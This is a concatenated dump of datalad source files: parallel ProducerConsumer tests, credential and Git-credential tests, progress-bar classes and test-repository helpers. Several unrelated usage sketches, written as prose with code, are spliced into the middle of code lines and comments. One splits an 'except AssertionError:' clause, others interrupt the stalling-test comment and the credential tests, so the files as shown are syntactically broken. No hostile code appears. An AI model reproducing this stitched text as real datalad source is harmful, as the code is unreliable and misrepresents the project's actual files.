futures to raise an exception can take some time etc, so\n # we could get more, but for sure we should not get all 999 and not even a 100\n if info_log_level:\n assert_greater(100, len(results))\n assert_equal(results[:4], [0, 2, 3, 4])\n\n def producer():\n for i in range(10):\n sleep(0.0003)\n yield i\n raise ValueError()\n # by default we do not stop upon producer failing\n assert_provides_and_raises(\n ProducerConsumer(producer(), consumer, jobs=2), ValueError, list(range(10)))\n # if producer produces more than we can as quickly consume but then fails\n # ATM we do not proceed to consume other items, but fail when we finish\n # consuming until the time point when producer has failed\n # by default we do not stop upon producer failing\n results = assert_provides_and_raises(\n ProducerConsumer(producer(), consumer, reraise_immediately=True, jobs=2),\n ValueError)\n # we will get some results, seems around 4 and they should be \"sequential\"\n assert_equal(results, list(range(len(results))))\n try:\n assert_greater_equal(len(results), 2)\n except 
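The dependency-aware scheduling exercised by `test_creatsubdatasets` above can also be used directly by caller code; a rough sketch, assuming a working datalad/git-annex installation and a throwaway temporary directory.

import os.path as op
import tempfile
from functools import partial

from datalad.api import create
from datalad.distribution.dataset import Dataset
from datalad.support.parallel import (
    ProducerConsumer,
    no_parentds_in_futures,
)

topdir = tempfile.mkdtemp()              # scratch location
superds = Dataset(topdir).create()

# A child path must not be consumed while its parent is still in flight;
# no_parentds_in_futures encodes exactly that constraint.
paths = [op.join(topdir, 'subds0'), op.join(topdir, 'subds0', 'subsub0')]
create_ = partial(create, result_xfm=None, return_type='generator')
list(ProducerConsumer(paths, create_,
                      safe_to_consume=no_parentds_in_futures, jobs=2))
superds.save(paths)                      # register the new subdatasets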
AssertionError:\n # Possible TODO: if tests below would start failing too, move xfail to the level\n # of the entire test\n pytest.xfail(f\"Rarely but happens. Got only {len(results)} instead of at least 2\")\n\n # This test relies too much on threads scheduling to not hog up on handling\n # consumers, but if it happens so - they might actually consume all results\n # before producer decides to finally raise an exception. As such it remains\n # flaky and thus not ran, but could be useful to test locally while\n # changing that logic.\n #\n # if info_log_level and not (on_windows or on_osx):\n # # consumers should not be able to consume all produced items.\n # # production of 10 should take 3 unites, while consumers 10/2 (jobs)\n # # 5 units, so some should not have a chance.\n # assert_greater_equal(8, len(results))\n\n # Simulate situation close to what we have when outside code consumes\n # some yielded results and then \"looses interest\" (on_failure=\"error\").\n # In this case we should still exit gracefully (no GeneratorExit warnings),\n # not over-produce, and also do not kill already running consumers\n consumed = []\n def inner():\n def consumer(i):\n sleep(0.01)\n consumed.append(i)\n return i\n pc = iter(ProducerConsumer(range(1000), consumer, jobs=2))\n yield next(pc)\n yield next(pc)\n # typically it should be [0, 1] but it does happen some times that\n # one other worker gets ahead and we get [0, 2]. As it is not per se the\n # purpose of this test to ensure absence of such race, we just allow for any\n # two from first 3 possible.\n assert len(set(inner()).intersection({0, 1, 2})) == 2\n consumed = sorted(consumed)\n assert_equal(consumed, list(range(len(consumed))))\n assert_greater_equal(len(consumed), 4) # we should wait for that 2nd batch to finish\n if info_log_level:\n assert_greater_equal(20, len(consumed))\n\n\n# `test_stalling` is a speculative test that is intended to detect stalled\n# subprocess execution by assuming an upper limit for the execution time of the\n# subprocess. Due to the nature of non-realtime process scheduling, this\n# assumption is necessarily incorrect and might be validated in a perfectly\n# working system. In other words, the test has the potential to create false\n# positives.\n# By raising the assumed maximum execution time, we try to reduce the number of\n# false positives.\n#\n# The test exists because an earlier version of `WitlessRunner` was based on\n# event loops and there was at least one stalling condition that manifested\n# itself in python 3.7 (see:\n# https://github.com/datalad/datalad/pull/5022#issuecomment-708716290). 
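The pattern the "graceful death" test checks for, collecting whatever results were produced before a consumer failed, looks like this from the caller's side; the failing consumer is invented for illustration.

from datalad.support.parallel import ProducerConsumer

def consumer(i):
    # made-up consumer that fails on one particular item
    if i == 5:
        raise ValueError("boom")
    return i

results = []
try:
    for res in ProducerConsumer(range(10), consumer, jobs=3):
        results.append(res)
except ValueError:
    # results yielded before the failure surfaced are retained; their
    # order is not guaranteed, as noted in the tests above
    print("collected %d results before the failure" % len(results))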
As of\n# datalad version 0.16, event loops are no longer used in `WitlessRunner` and\n# this test is a shot in the dark.\ndef test_stalling(kill=False):\n import concurrent.futures\n\n from datalad.runner.coreprotocols import StdOutErrCapture\n from datalad.runner.runner import WitlessRunner\n\n def worker():\n return WitlessRunner().run([\"echo\", \"1\"], StdOutErrCapture)\n\n t0 = time()\n result1 = worker()\n dt1 = time() - t0\n\n t0 = time()\n with concurrent.futures.ThreadPoolExecutor(1) as executor:\n future = executor.submit(worker)\n dt2_limit = max((5, dt1 * 100))\n while not future.done():\n sleep(dt1/3)\n if time() - t0 > dt2_limit:\n # does not even shutdown\n # executor.shutdown(wait=False)\n if kill:\n # raising an exception isn't enough!\n print(\"exceeded\")\n import os\n import signal\n os.kill(os.getpid(), signal.SIGTERM)\n raise AssertionError(f\"Future has not finished in {dt2_limit}s\")\n result2 = future.result()\n assert result1 == result2\n\n\n@with_tempfile(mkdir=True)\ndef test_parallel_flyweights(topd=None):\n from datalad.support.gitrepo import GitRepo\n\n # ProducerConsumer relies on unique args to consumer so we will provide 2nd different arg\n def create_GitRepo(args):\n return GitRepo(args[0])\n\n # let's really hunt down race condition\n for batch in range(10):\n repopath = op.join(topd, str(batch))\n # should succeed and be the same thing\n # An example of errored run: https://github.com/datalad/datalad/issues/6598\n repos = list(\n ProducerConsumer(\n ((repopath, i) for i in range(10)),\n create_GitRepo,\n jobs=10\n )\n )\n assert op.exists(repopath)\n instances = set(map(id, repos))\n assert len(instances) == 1\n\n\nif __name__ == '__main__':\n test_ProducerConsumer()\n # test_creatsubdatasets()\n # test_stalling(kill=True)\n" }, { "alpha_fraction": 0.616432249546051, "alphanum_fraction": 0.6234644651412964, "avg_line_length": 35.355987548828125, "blob_id": "554aa8702d434e4aafbbfea2a1cc0f40fa8563fa", "content_id": "24c519b5b91d18862a92c278df72c3c82539ace8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11234, "license_type": "permissive", "max_line_length": 97, "num_lines": 309, "path": "/datalad/downloaders/tests/test_credentials.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for credentials\"\"\"\n\nfrom unittest.mock import patch\n\nfrom datalad import cfg as dlcfg\nfrom datalad.api import Dataset\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.keyring_ import (\n Keyring,\n MemoryKeyring,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_false,\n assert_in,\n assert_raises,\n assert_true,\n ok_file_has_content,\n skip_if,\n with_tempfile,\n with_testsui,\n)\n\nfrom ..credentials import (\n AWS_S3,\n CompositeCredential,\n GitCredential,\n UserPassword,\n)\n\n\n@with_testsui(responses=[\n 'user1', 'password1',\n # when we do provide user to enter_new\n 'newpassword',\n])\ndef test_cred1_enter_new():\n keyring = MemoryKeyring()\n cred = UserPassword(\"name\", keyring=keyring)\n 
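Outside of the stalling test above, the same runner call can be used on its own; a small sketch, assuming that the `StdOutErrCapture` protocol returns the captured output under 'stdout'/'stderr' keys of the result mapping.

from datalad.runner.coreprotocols import StdOutErrCapture
from datalad.runner.runner import WitlessRunner

# Run a trivial command and capture its output, as in test_stalling above.
res = WitlessRunner().run(["echo", "1"], StdOutErrCapture)

# assumed result layout: a mapping with decoded 'stdout'/'stderr' entries
print(res.get("stdout"), end="")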
assert_false(cred.is_known)\n assert_equal(cred.enter_new(), None)\n assert_true(cred.is_known)\n assert_equal(keyring.get('name', 'user'), 'user1')\n assert_equal(keyring.get('name', 'password'), 'password1')\n keyring.delete('name')\n assert_raises(KeyError, keyring.delete, 'name', 'user')\n assert_raises(KeyError, keyring.delete, 'name')\n assert_equal(keyring.get('name', 'user'), None)\n\n # Test it blowing up if we provide unknown field\n with assert_raises(ValueError) as cme:\n cred.enter_new(username='user')\n assert_in('field(s): username. Known but not specified: password, user',\n str(cme.value))\n\n # Test that if user is provided, it is not asked\n cred.enter_new(user='user2')\n assert_equal(keyring.get('name', 'user'), 'user2')\n assert_equal(keyring.get('name', 'password'), 'newpassword')\n\n\n@with_testsui(responses=['password1', 'newuser', 'newpassword'])\ndef test_cred1_call():\n keyring = MemoryKeyring()\n cred = UserPassword(\"name\", keyring=keyring)\n # we will set the name but not the password, expecting UI\n # requesting it\n assert_equal(keyring.set('name', 'user', 'user1'), None)\n assert_equal(keyring.get('name', 'user'), 'user1')\n assert_equal(cred(), {'user': 'user1', 'password': 'password1'})\n assert_equal(keyring.get('name', 'password'), 'password1')\n # without intervention the same credentials will be reused\n # in subsequent attempts\n assert_equal(cred(), {'user': 'user1', 'password': 'password1'})\n with patch.dict(dlcfg._merged_store, {'datalad.credentials.force-ask': 'yes'}):\n assert_equal(cred(), {'user': 'newuser', 'password': 'newpassword'})\n assert_equal(keyring.get('name', 'user'), 'newuser')\n assert_equal(keyring.get('name', 'password'), 'newpassword')\n\n\ndef test_keyring():\n # mock out keyring methods and test that we are providing correct values\n # with 'datalad-' prefix\n raise SkipTest(\"provide tests for Keyring which interfaces keyring module\")\n\n\ndef _cred1_adapter(composite, user=None, password=None):\n \"\"\"Just a sample adapter from one user/pw type to another\"\"\"\n return dict(user=user + \"_1\", password=password + \"_2\")\n\n\nclass _CCred1(CompositeCredential):\n \"\"\"A Simple composite credential which will do some entries transformation\n \"\"\"\n _CREDENTIAL_CLASSES = (UserPassword, UserPassword)\n _CREDENTIAL_ADAPTERS = (_cred1_adapter,)\n\n\n@with_testsui(responses=['user1', 'password1',\n 'user2', 'password2'])\ndef test_composite_credential1():\n # basic test of composite credential\n keyring = MemoryKeyring()\n cred = _CCred1(\"name\", keyring=keyring)\n # When queried, does the chain\n assert_equal(cred(), {'user': 'user1_1', 'password': 'password1_2'})\n # But the \"Front\" credential is exposed to the user\n assert_equal(cred.get('user'), 'user1')\n assert_equal(keyring.get('name', 'user'), 'user1')\n assert_raises(ValueError, cred.get, 'unknown_field')\n assert_equal(cred.get('password'), 'password1')\n assert_equal(keyring.get('name', 'password'), 'password1')\n # ATM composite credential stores \"derived\" ones unconditionally in the\n # keyring as well\n assert_equal(keyring.get('name:1', 'user'), 'user1_1')\n assert_equal(keyring.get('name:1', 'password'), 'password1_2')\n\n # and now enter new should remove \"derived\" entries\n cred.enter_new()\n assert_equal(keyring.get('name', 'user'), 'user2')\n assert_equal(keyring.get('name', 'password'), 'password2')\n # we immediately refresh all credentials in the chain\n assert_equal(keyring.get('name:1', 'user'), 'user2_1')\n 
assert_equal(keyring.get('name:1', 'password'), 'password2_2')\n assert_equal(cred(), {'user': 'user2_1', 'password': 'password2_2'})\n\n\ndef test_credentials_from_env():\n keyring = Keyring()\n cred = AWS_S3(\"test-s3\", keyring=keyring)\n assert_false(cred.is_known)\n assert_equal(cred.get('key_id'), None)\n assert_equal(cred.get('secret_id'), None)\n\n def _check1():\n assert_equal(cred.get('key_id'), '1')\n assert_false(cred.is_known)\n\n def _check2():\n assert_equal(cred.get('key_id'), '1')\n assert_equal(cred.get('secret_id'), '2')\n assert_true(cred.is_known)\n\n # this is the old way, should still work\n with patch.dict('os.environ', {'DATALAD_test_s3_key_id': '1'}):\n _check1()\n with patch.dict('os.environ', {'DATALAD_test_s3_secret_id': '2'}):\n _check2()\n assert_false(cred.is_known) # no memory of the past\n\n # here is the new way\n import datalad\n try:\n with patch.dict('os.environ', {'DATALAD_CREDENTIAL_test__s3_key__id': '1'}):\n datalad.cfg.reload()\n _check1()\n with patch.dict('os.environ', {'DATALAD_CREDENTIAL_test__s3_secret__id': '2'}):\n datalad.cfg.reload()\n _check2()\n datalad.cfg.reload()\n assert_false(cred.is_known) # no memory of the past\n finally:\n datalad.cfg.reload()\n\n\n@skip_if(not external_versions['keyrings.alt'])\n@with_tempfile\ndef test_delete_not_crashing(path=None):\n # although in above test we just use/interact with Keyring without specifying\n # any custom one, there we do not change it so I guess it is ok. Here we want\n # a real keyring backend which we will alter\n from keyrings.alt.file import PlaintextKeyring\n kb = PlaintextKeyring()\n kb.filename = path\n\n keyring = Keyring(keyring_backend=kb)\n cred = UserPassword(\"test1\", keyring=keyring)\n\n cred.set(user=\"user1\", password=\"password\")\n ok_file_has_content(path, \".*test1.*\", re_=True) # keyring backend saves where we expect\n\n # manually delete one component of the credential\n cred._keyring.delete(cred.name, next(iter(cred._FIELDS)))\n\n # now delete entire credential -- we must not crash\n cred.delete()\n try:\n ok_file_has_content(path, \".*test1.*\", re_=True) # keyring backend saves where we expect\n raise AssertionError(\"keyring still has our key\")\n except AssertionError:\n pass\n\n\n@with_tempfile\ndef test_gitcredential_read(path=None):\n\n matching_url = \"https://example.datalad.org\"\n non_matching_url = \"http://some.other.org\"\n ds = Dataset(path).create()\n\n # Set configs so git-credential does provide something,\n # using an inline helper:\n\n # Simple inline credential helper to provide a password to read.\n # Strangely seems to pass on windows. 
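A compact, non-interactive sketch of the credential API exercised above, kept entirely in memory so no real keyring is touched; the service label and values are made up.

from datalad.downloaders.credentials import UserPassword
from datalad.support.keyring_ import MemoryKeyring

keyring = MemoryKeyring()                      # nothing persisted
cred = UserPassword("example-service", keyring=keyring)

assert not cred.is_known
cred.set(user="alice", password="secret")      # provide both fields up front
assert cred.is_known
assert cred.get("user") == "alice"
assert cred() == {"user": "alice", "password": "secret"}

cred.delete()                                  # wipe it again
assert not cred.is_known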
Probably depends on what git is\n # passing this definition to (git-bash).\n cred_helper = \\\n \"!f() { test \\\"$1\\\" = get && echo \\\"password=apassword\\\"; }; f\"\n\n ds.config.add(f\"credential.{matching_url}.username\", \"auser\",\n scope=\"local\")\n ds.config.add(f\"credential.{matching_url}.helper\", cred_helper,\n scope=\"local\")\n\n # we can get those credentials when the context is right:\n cred = GitCredential(\"some\", auth_url=matching_url,\n dataset=ds)\n\n assert_true(cred.is_known)\n assert_equal(cred.get('user'), 'auser')\n assert_equal(cred.get('password'), 'apassword')\n\n # env var overrules\n import datalad\n try:\n with patch.dict('os.environ', {'DATALAD_CREDENTIAL_some_user': 'new'}):\n datalad.cfg.reload()\n assert_true(cred.is_known)\n assert_equal(cred.get('user'), 'new')\n assert_equal(cred.get('password'), 'apassword')\n with patch.dict('os.environ',\n {'DATALAD_CREDENTIAL_some_password': 'pwd'}):\n datalad.cfg.reload()\n assert_true(cred.is_known)\n assert_equal(cred.get('user'), 'new')\n assert_equal(cred.get('password'), 'pwd')\n finally:\n datalad.cfg.reload()\n\n # different context\n cred = GitCredential(\"some\", auth_url=non_matching_url,\n dataset=ds)\n # unknown since git-credential config doesn't match\n assert_false(cred.is_known)\n\n # however, w/ env vars still works:\n try:\n with patch.dict('os.environ',\n {'DATALAD_CREDENTIAL_some_user': 'user3'}):\n datalad.cfg.reload()\n assert_false(cred.is_known) # no pwd yet\n assert_equal(cred.get('user'), 'user3')\n assert_equal(cred.get('password'), None)\n with patch.dict('os.environ',\n {'DATALAD_CREDENTIAL_some_password': 'pass3'}):\n datalad.cfg.reload()\n assert_true(cred.is_known)\n assert_equal(cred.get('user'), 'user3')\n assert_equal(cred.get('password'), 'pass3')\n # without the env vars unknown yet again:\n assert_false(cred.is_known)\n finally:\n datalad.cfg.reload()\n\n\n@with_tempfile\ndef test_gitcredential(path=None):\n\n # Note, that credential labels are irrelevant in context of the to be tested\n # Object here.\n\n matching_url = \"https://example.datalad.org\"\n non_matching_url = \"http://some.other.org\"\n ds = Dataset(path).create()\n # use git native credential store\n ds.config.add(\"credential.helper\", \"store\", scope='local')\n\n # store credentials\n cred = GitCredential(\"cred_label\", auth_url=matching_url, dataset=ds)\n cred.set(user=\"dl-user\", password=\"dl-pwd\")\n\n # read it again\n cred2 = GitCredential(\"whatever\", auth_url=matching_url, dataset=ds)\n assert_equal(cred2.get(\"user\"), \"dl-user\")\n assert_equal(cred2.get(\"password\"), \"dl-pwd\")\n # but doesn't deliver w/o matching url\n cred3 = GitCredential(\"whatever\", auth_url=non_matching_url, dataset=ds)\n assert_equal(cred3.get(\"user\"), None)\n assert_equal(cred3.get(\"password\"), None)\n\n # delete it\n cred2.delete()\n\n # not there anymore\n cred4 = GitCredential(\"yet_another\", auth_url=matching_url, dataset=ds)\n assert_equal(cred4.get(\"user\"), None)\n assert_equal(cred4.get(\"password\"), None)\n\n # delete non-existing\n cred2.delete()\n" }, { "alpha_fraction": 0.5147058963775635, "alphanum_fraction": 0.5173723101615906, "avg_line_length": 32.630435943603516, "blob_id": "5d94f50b16804956c343425f66b55d15795a8c91", "content_id": "3d855e2f82cd453d6d998a2a1e2fdbeb8ba27fb0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12376, "license_type": "permissive", "max_line_length": 91, "num_lines": 368, "path": 
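The Git-credential-backed variant can be driven the same way as in the tests above; a sketch that points Git's 'store' helper at a throwaway file so the user's real credential store stays untouched, with a placeholder URL.

import os.path as op
import tempfile

from datalad.api import Dataset
from datalad.downloaders.credentials import GitCredential

ds = Dataset(tempfile.mkdtemp()).create()
cred_file = op.join(tempfile.mkdtemp(), 'git-credentials')
ds.config.add("credential.helper", "store --file=%s" % cred_file,
              scope="local")

url = "https://example.datalad.org"            # placeholder
cred = GitCredential("any-label", auth_url=url, dataset=ds)
cred.set(user="dl-user", password="dl-pwd")

# a second instance with a matching URL context reads it back via Git
cred2 = GitCredential("other-label", auth_url=url, dataset=ds)
assert cred2.get("user") == "dl-user"
assert cred2.get("password") == "dl-pwd"
cred2.delete()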
"/datalad/ui/progressbars.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Progress bar implementations to be used.\n\nShould not be imported until we know that interface needs it\n\"\"\"\n\nimport humanize\nimport sys\nimport time\n\nfrom .. import lgr\n\n#\n# Haven't found an ideal progress bar yet, so to make things modular etc\n# we will provide our interface and adapters for few popular ones\n#\n\n\nclass ProgressBarBase(object):\n \"\"\"Base class for any progress bar\"\"\"\n\n def __init__(self, label=None, fill_text=None, total=None, out=None, unit='B'):\n self.label = label\n self.fill_text = fill_text\n self.total = total\n self.unit = unit\n self.out = out\n self._current = 0\n\n def refresh(self):\n \"\"\"Force update\"\"\"\n pass\n\n def update(self, size, increment=False, total=None):\n if total:\n self.total = total\n if not size:\n return\n if increment:\n self._current += size\n else:\n self._current = size\n\n @property\n def current(self):\n return self._current\n\n @current.setter\n def current(self, value):\n assert value >= 0, \"Total cannot be negative\"\n self._current = value\n\n def start(self, initial=0):\n self._current = initial\n\n def finish(self, partial=False):\n \"\"\"\n\n Parameters\n ----------\n partial: bool\n To signal that finish is called possibly before the activity properly\n finished, so .total count might have not been reached\n\n Returns\n -------\n\n \"\"\"\n pass\n\n def clear(self):\n pass\n\n def set_desc(self, value):\n pass # to override in subclass on how to handle description\n\n\nclass SilentProgressBar(ProgressBarBase):\n def __init__(self, label='', fill_text=None, total=None, unit='B', out=sys.stdout):\n super(SilentProgressBar, self).__init__(total=total)\n\n\nclass LogProgressBar(ProgressBarBase):\n \"\"\"A progress bar which logs upon completion of the item\n\n Note that there is also :func:`~datalad.log.log_progress` which can be used\n to get progress bars when attached to a tty but incremental log messages\n otherwise (as opposed to just the final log message provided by\n `LogProgressBar`).\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(LogProgressBar, self).__init__(*args, **kwargs)\n # I think we never generate progress bars unless we are at the beginning\n # of reporting something lengthy. 
.start is not always invoked so\n # we cannot reliably set it there instead of the constructor (here)\n self._start_time = time.time()\n\n @staticmethod\n def _naturalfloat(x):\n \"\"\"Return string representation of a number for human consumption\n\n For abs(x) <= 1000 would use 'scientific' (%g) notation, and for the\n larger a regular int (after rounding)\n \"\"\"\n return ('%g' % x) if abs(x) <= 1000 else '%i' % int(round(x))\n\n def _naturalsize(self, x):\n if self.unit == 'B':\n return humanize.naturalsize(x)\n else:\n return '%s%s' % (self._naturalfloat(x), self.unit or '')\n\n @staticmethod\n def _naturaldelta(x):\n # humanize is too human for little things\n return humanize.naturaldelta(x) \\\n if x > 2 \\\n else LogProgressBar._naturalfloat(x) + ' sec'\n\n def start(self, initial=0):\n super().start(initial=initial)\n msg = \" with initial specified to be {initial}\" if initial else ''\n lgr.info(\"Start %s%s\", self.label, msg)\n\n def finish(self, partial=False):\n msg, args = ' %s ', [self.label]\n\n if partial:\n # that is the best we know so far:\n amount = self.current\n if self.total is not None:\n if amount != self.total:\n perc_done = 100. * amount / self.total\n if perc_done <= 100:\n msg += \"partially (%.2f%% of %s) \"\n args += [\n perc_done,\n self._naturalsize(self.total)\n ]\n else:\n # well well -- we still probably have some issue with\n # over-reporting when getting data from datalad-archives\n # Instead of providing non-sense % here, just report\n # our best guess\n msg += \"possibly partially \"\n else:\n # well -- that means that we did manage to get all of it\n pass\n else:\n msg += \"possibly partially \"\n msg += \"done\"\n else:\n # Are we \"finish\"ed because interrupted or done?\n amount = self.total\n if amount:\n msg += '%s done'\n args += [self._naturalsize(amount)]\n else:\n msg += \"done\"\n\n dt = float(time.time() - self._start_time)\n\n if dt:\n msg += ' in %s'\n args += [self._naturaldelta(dt)]\n\n if amount:\n speed = amount / dt\n msg += ' at %s/sec'\n args += [self._naturalsize(speed)]\n\n lgr.info(msg, *args)\n\n\nprogressbars = {\n # let for compatibility, use \"none\" instead\n 'silent': SilentProgressBar,\n 'none': SilentProgressBar,\n 'log': LogProgressBar,\n}\n\n\ntry:\n from tqdm import tqdm\n from datalad.utils import updated\n\n class tqdmProgressBar(ProgressBarBase):\n \"\"\"Adapter for tqdm.ProgressBar\"\"\"\n\n backend = 'tqdm'\n _frontends = {\n None: tqdm,\n 'ipython': None # to be loaded\n }\n\n _default_pbar_params = {\n 'mininterval': 0.1,\n 'dynamic_ncols': True, # react to changes in the terminal width\n }\n\n def __init__(self, label='', fill_text=None,\n total=None, unit='B', out=sys.stdout, leave=False,\n frontend=None):\n \"\"\"\n\n Parameters\n ----------\n label\n fill_text\n total\n unit\n out\n leave\n frontend: (None, 'ipython'), optional\n tqdm module to use. Could be tqdm_notebook if under IPython\n \"\"\"\n super(tqdmProgressBar, self).__init__(label=label,\n total=total,\n unit=unit)\n\n if frontend not in self._frontends:\n raise ValueError(\n \"Know only about following tqdm frontends: %s. 
Got %s\"\n % (', '.join(map(str, self._frontends)),\n frontend))\n\n tqdm_frontend = self._frontends[frontend]\n if not tqdm_frontend:\n if frontend == 'ipython':\n from tqdm import tqdm_notebook\n tqdm_frontend = self._frontends[frontend] = tqdm_notebook\n else:\n lgr.error(\n \"Something went wrong here, using default tqdm frontend for %s\",\n frontend)\n tqdm_frontend = self._frontends[frontend] = self._frontends[None]\n\n self._tqdm = tqdm_frontend\n self._pbar_params = updated(\n self._default_pbar_params,\n dict(desc=label, unit=unit,\n unit_scale=True, total=total, file=out,\n leave=leave,\n ))\n if label and 'total' in label.lower() and 'smoothing' not in self._pbar_params:\n # ad-hoc: All tqdm totals will report total mean, and not some\n # momentary speed\n self._pbar_params['smoothing'] = 0\n self._pbar = None\n\n def _create(self, initial=0):\n if self._pbar is None:\n self._pbar = self._tqdm(initial=initial, **self._pbar_params)\n\n def update(self, size, increment=False, total=None):\n self._create()\n if total is not None:\n # only a reset can change the total of an existing pbar\n self._pbar.reset(total)\n # we need to (re-)advance the pbar back to the old state\n self._pbar.update(self.current)\n # an update() does not (reliably) trigger a refresh, hence\n # without the next, the pbar may still show zero progress\n if not size:\n # whenever a total is changed, we need a refresh. If there is\n # no progress update, we do it here, else we'll do it after\n # the progress update\n self._pbar.refresh()\n # if we set a new total and also advance the progress bar:\n if not size:\n return\n inc = size - self.current\n try:\n self._pbar.update(size if increment else inc)\n if total:\n # refresh to new total and progress\n self._pbar.refresh()\n except ValueError:\n # Do not crash entire process because of some glitch with\n # progressbar update\n # TODO: issue a warning?\n pass\n super(tqdmProgressBar, self).update(size,\n increment=increment,\n total=total)\n\n def start(self, initial=0):\n super(tqdmProgressBar, self).start(initial=initial)\n self._create(initial=initial)\n\n def refresh(self):\n super(tqdmProgressBar, self).refresh()\n # older tqdms might not have refresh yet but I think we can live\n # without it for a bit there\n if hasattr(self._tqdm, 'refresh'):\n self._pbar.refresh()\n\n def finish(self, clear=False, partial=False):\n \"\"\"\n\n Parameters\n ----------\n clear : bool, optional\n Explicitly clear the progress bar. 
Note that we are\n creating them with leave=False so they should disappear on their\n own and explicit clear call should not be necessary\n\n Returns\n -------\n\n \"\"\"\n if clear:\n self.clear()\n # be tolerant to bugs in those\n try:\n if self._pbar is not None:\n self._pbar.close()\n finally:\n self._pbar = None\n try:\n super(tqdmProgressBar, self).finish()\n except Exception as exc: # pragma: no cover\n #lgr.debug(\"Finishing tqdmProgresBar thrown %s\", str_exc(exc))\n pass\n\n def clear(self):\n try:\n self._pbar.clear()\n except:\n # if has none -- we can't do anything about it for now ;)\n # 4.7.4 seems to have it\n pass\n\n def set_desc(self, value):\n self._pbar.desc = value\n\n\n progressbars['tqdm'] = tqdmProgressBar\nexcept ImportError: # pragma: no cover\n pass\n\nassert len(progressbars), \"We need tqdm library to report progress\"\n\n\nclass AnnexSpecialRemoteProgressBar(ProgressBarBase):\n \"\"\"Hook up to the special remote and report progress back to annex\"\"\"\n\n def __init__(self, *args, **kwargs):\n # not worth passing anything since we don't care about anything\n remote = kwargs.get('remote')\n super(AnnexSpecialRemoteProgressBar, self).__init__()\n self.remote = remote\n\n def update(self, *args, **kwargs):\n super(AnnexSpecialRemoteProgressBar, self).update(*args, **kwargs)\n # now use stored value\n if self.remote:\n self.remote.send_progress(self.current)\n\nprogressbars['annex-remote'] = AnnexSpecialRemoteProgressBar\n" }, { "alpha_fraction": 0.5619664192199707, "alphanum_fraction": 0.5655466914176941, "avg_line_length": 33.25471878051758, "blob_id": "7a26d92dc01c2e9bdd060019ec1f61c158136297", "content_id": "b0e201eb7176847517b90fcdde4399f81b1229cb", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7262, "license_type": "permissive", "max_line_length": 96, "num_lines": 212, "path": "/datalad/tests/utils_testrepos.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport os\nimport tempfile\nfrom abc import (\n ABCMeta,\n abstractmethod,\n)\nfrom os.path import (\n exists,\n)\nfrom os.path import join as opj\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.customremotes.base import init_datalad_remote\n\nfrom .. import __version__\nfrom ..support.annexrepo import AnnexRepo\nfrom ..support.external_versions import external_versions\nfrom ..support.gitrepo import GitRepo\nfrom ..support.network import get_local_file_url\nfrom ..utils import (\n swallow_logs,\n swallow_outputs,\n)\nfrom . 
import _TEMP_PATHS_GENERATED\nfrom .utils_pytest import get_tempfile_kwargs\n\n# eventually become a URL to a local file served via http\n# that can be used for http/url-based testing\nremote_file_url = None\n\n\nclass TestRepo(object, metaclass=ABCMeta):\n\n REPO_CLASS = None # Assign to the class to be used in the subclass\n\n def __init__(self, path=None, puke_if_exists=True):\n if not path:\n path = \\\n tempfile.mktemp(**get_tempfile_kwargs(\n {'dir': dl_cfg.get(\"datalad.tests.temp.dir\")},\n prefix='testrepo'))\n # to be removed upon teardown\n _TEMP_PATHS_GENERATED.append(path)\n if puke_if_exists and exists(path):\n raise RuntimeError(\"Directory %s for test repo already exist\" % path)\n # swallow logs so we don't print all those about crippled FS etc\n with swallow_logs():\n self.repo = self.REPO_CLASS(path)\n # For additional testing of our datalad remote to not interfere\n # and manage to handle all http urls and requests:\n if self.REPO_CLASS is AnnexRepo and \\\n os.environ.get('DATALAD_TESTS_DATALADREMOTE'):\n init_datalad_remote(self.repo, 'datalad', autoenable=True)\n\n self._created = False\n\n @property\n def path(self):\n return self.repo.path\n\n @property\n def url(self):\n return get_local_file_url(self.path, compatibility='git')\n\n def create_file(self, name, content, add=True, annex=False):\n filename = opj(self.path, name)\n with open(filename, 'wb') as f:\n f.write(content.encode())\n if add:\n if annex:\n if isinstance(self.repo, AnnexRepo):\n self.repo.add(name)\n else:\n raise ValueError(\"Can't annex add to a non-annex repo.\")\n else:\n self.repo.add(name, git=True)\n\n def create(self):\n if self._created:\n assert(exists(self.path))\n return # was already done\n with swallow_outputs(): # we don't need those outputs at this point\n self.populate()\n self._created = True\n\n @abstractmethod\n def populate(self):\n raise NotImplementedError(\"Should be implemented in sub-classes\")\n\n\nclass BasicAnnexTestRepo(TestRepo):\n \"\"\"Creates a basic test git-annex repository\"\"\"\n\n REPO_CLASS = AnnexRepo\n\n def populate(self):\n global remote_file_url\n if not remote_file_url:\n # we need a local file, that is server via a URL\n from datalad.conftest import test_http_server\n remote_file_name = 'testrepo-annex.dat'\n with open(opj(test_http_server.path, remote_file_name), 